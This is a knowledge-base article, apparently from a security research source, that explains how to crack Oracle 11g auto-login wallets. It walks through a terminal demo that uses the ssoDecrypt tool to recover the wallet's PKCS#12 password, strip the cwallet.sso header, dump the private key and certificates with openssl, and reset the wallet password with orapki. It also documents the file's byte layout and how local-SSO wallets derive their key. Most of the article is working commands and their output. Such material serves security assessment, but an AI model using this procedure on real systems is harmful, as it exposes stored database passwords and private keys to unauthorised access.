Knowledge Base : How to crack Oracle Wallets

Oracle Wallets can be used to store SSL certificates, private keys and even plain text passwords (“secure external password store”) for database authentication. Oracle provides a functionality to access Wallets without a need to enter the wallet password manually. This is called “auto login” (Single-Sign-On aka SSO). There is also a functionality to prevent a wallet which has been copied to a remote system to be opened. This is called “auto login local”.

Unfortunately, there are ways to decrypt auto login wallets and read the contents. This is possible because the password is written into the header of the wallets “cwallet.sso” file.

Step-by-step guide

  1. Download the Java Cryptography Extension (JCE) Unlimited Strength Jurisdiction Policy Files
  2. Download OKS
  3. Download ssoDecrypt
  4. Patch JRE with JCE Unlimited Strength Jurisdiction Policy
  5. Copy the content of the “oks” folder from the OKS PoC above into  the libs/ folder of ssoDecrypt
  6. Compile and run ssoDecrypt with the path to “cwallet.sso” as argument
  7. Copy cwallet.sso to newP12wallet.p12 without SSO header (first 77 bytes)
  8. Set us a new password for your wallet with the old password we decrypted earlier
  9. Use the new wallet with “orapki” and our new password

Demo

Install everything

$ sudo cp local_policy.jar /usr/lib/jvm/java-8-oracle/jre/lib/security/
$ sudo cp US_export_policy.jar /usr/lib/jvm/java-8-oracle/jre/lib/security/
$ javac -cp .:libs/:libs/bcprov-jdk16-145.jar ssoDecryptor.java
$ vi ssoDecrypt.sh
#!/bin/sh
java -cp .:libs:libs/bcprov-jdk16-145.jar ssoDecryptor $@

Actually crack the SSO wallet

$ ./ssoDecrypt.sh ../Pablo-Linux11/cwallet.sso 
sso key: c29XXXXXXXXXX96
sso secret: 71c61e1XXXXXXXXXX99c77d747fa0f53e79ccd170409964b
p12 password (hex): 1e482XXXXXXXXXX1f1f0b296f6178021c
--------------------------------------------------------
----------------------------------------------

You may now reinstall the original wallet:

$ echo 1e482XXXXXXXXXX1f1f0b296f6178021c | xxd -p -r > cwallet.key
$ ls -lhrt
total 18K
-rwxr--r-- 1 akira friends 6,5K Nov 24 15:16 ewallet.p12
-rw------- 1 akira friends 6,5K Nov 24 15:16 cwallet.sso
-rw-r--r-- 1 akira friends 16 Nov 24 18:28 cwallet.key
akira@LinuxMintWorkstation ~/SSO/Pablo-Linux11 $ dd if=cwallet.sso of=NewP12wallet.p12 bs=1 skip=77
6560+0 records in
6560+0 records out
6560 bytes (6,6 kB) copied, 0,0240742 s, 272 kB/s

Test validity of the P12 file:

$ openssl pkcs12 -in NewP12wallet.p12 -nodes -passin file:cwallet.key 
MAC verified OK
Bag Attributes
 friendlyName: orakey
 localKeyID: E6 B6 52 DD 00 00 00 04 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 
Key Attributes: <No Attributes>
-----BEGIN PRIVATE KEY-----
MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKabcdSlAgEAAoIBAQCk1c6DKFmmUz01
(...)
-----END CERTIFICATE-----
Bag Attributes
 friendlyName: orakey
 localKeyID: E6 B6 52 DD 00 00 00 04 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 
subject=/CN=ORCL11G
issuer=/C=DE/ST=Hamburg/O=ps.corp/CN=PS.CORP-PROC01
-----BEGIN CERTIFICATE-----
MIIE6jCCAtKgAwIBAgICEAEwDQYJKoZabcdNAQELBQAwSjELMAkGA1UEBhMCREUx
(...)
-----END CERTIFICATE-----

Set a new password for our wallet:

$ orapki wallet change_pwd -wallet NewP12wallet.p12 -oldpwd `cat cwallet.key` -newpwd test1234
Oracle PKI Tool : Version 12.1.0.2
Copyright (c) 2004, 2014, Oracle and/or its affiliates. All rights reserved.

Use the “new” wallet:

$ orapki wallet display -wallet NewP12wallet.p12
Oracle PKI Tool : Version 12.1.0.2
Copyright (c) 2004, 2014, Oracle and/or its affiliates. All rights reserved.
Enter wallet password: 
Requested Certificates: 
User Certificates:
Subject: CN=ORCL11G
Trusted Certificates: 
Subject: CN=PS.CORP-PROC01,O=ps.corp,ST=Hamburg,C=DE
Subject: CN=PS.CORP-ROOT01,O=ps.corp,ST=Hamburg,C=DE

This very approach currently works with 11g only.

Background

 File structure of 11g cwallet.sso

0x00 - 0x4C     Header:
    0x00 - 0x02     First 3 bytes are always A1 F8 4E (wallet recognition?!)
    0x03            Type = SSO: 36; LSSO: 38
    0x04 - 0x06     00 00 00
    0x07            Version (10g: 05; 11g:  06)
    0x08 - 0x0A     00 00 00
    0x0B - 0x0C     11g: always the same (41 35)
    0x0D - 0x1C     DES key
    0x1D - 0x4C     DES secret (DES -> CBC -> PKCS7 padding) which contains the PKCS#12 password
0x4D - EOF      PKCS#12 data (ASN.1 block)

 Local SSO wallet

In the local SSO wallet version (-auto_login_local), the decrypted DES secret is a message which needs to be hashed (HMAC SHA1) with a key to get the actual PKCS#12 password. This key is made from username and hostname of the original system.

See also